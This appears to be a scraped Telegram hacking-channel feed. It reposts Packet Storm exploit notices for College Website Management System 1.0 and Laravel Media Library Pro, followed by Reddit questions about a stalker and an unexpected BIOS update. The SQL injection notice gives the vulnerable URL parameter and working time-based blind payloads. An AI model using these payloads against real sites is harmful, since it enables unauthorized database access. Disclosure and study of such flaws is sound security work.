Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
College Website Management System 1.0 SQL Injection

https://3.bp.blogspot.com/-Q0zmt52Iz_s/WWlvCi1SqRI/AAAAAAAAIKo/56GGQ_7zLBsvaLtYw9wmjI_Jb6z2oza2QCLcBGAs/s1600/h129.png
College Website Management System version 1.0 suffers from a remote SQL injection vulnerability.

MD5 | 0d24d3675c92cd6b4566d20cd36be0d8

Download
# Exploit Title: College Website Management System 1.0 - SQL Injection
# Date: 12/03/2022
# Exploit Author: Mr Empy
# Software Link:
https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Linux

Title:
================
College Website Management System 1.0 - SQL Injection
Summary:
================
The College Website Management System application in version 1.0 is
vulnerable to SQL injection allowing the attacker to make requests to the
database.
Severity Level:
================
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Affected Product:
================
College Website Management System v1.0
Steps to Reproduce:
================

1. Open your browser and go to
http://target/cwms/admin/?page=articles/view_article&id=1.

2. In the "id" parameter add the following payload:

' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc

After that, the server will only respond after 10 seconds have passed.
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=articles/view_article&id=1' AND (SELECT 2016 FROM
(SELECT(SLEEP(5)))kbJu) AND 'SfwZ'='SfwZ
---

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Laravel Media Library Pro 2.1.6 Shell Upload

https://4.bp.blogspot.com/-yT3eHciMBDw/WWlvGfUXh9I/AAAAAAAAILU/lYidSj08G0suEfC69x80tZFrj-NYN5F9wCLcBGAs/s1600/h137.png
Laravel Media Library Pro versions 2.1.6 and below as well as 1.17.10 and below suffer from a remote shell upload vulnerability.

MD5 | 1228b251a7f271fd7da635499b0bd342

Download
# Exploit Title: Laravel Media Library Pro <=2.1.6
# Google Dork: -
# Date: Mar 13, 2022
# Exploit Author: Kelvin Yip
Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
How I managed to trigger XSS automatically to get critical account takeover

Hello everybody! This is my first medium post so I hope you like it.Continue reading on Medium »
Read more...
hacking: security in practice
Social media stalker

So my sister is kinda big on social media and there’s someone stalking her through a fake Instagram page. They somehow hacked to find out her home address and are asking to meet up with her so it’s kinda scary. Are there any tips or tricks to find their real identity or general location? They don’t have any posts or pictures to go off of

submitted by /u/gildedbutterfly94
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
was my computers bios hacked? / injected with some sort of malware or root kit?

i randomly started up my computer today did not download any updates at all im on windows 10 and my hard drive is fully encypted with AES-256-Serpent using veryacrypt anyways i got this weird loading screen that says " HP BIOS UPDATE do not shut down the computer updating bios" since when did people get involuntary updates to their pc's bios?

was this an attempt from an attacker to take control of my computers boot loader/ bios?

submitted by /u/KillaX9
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video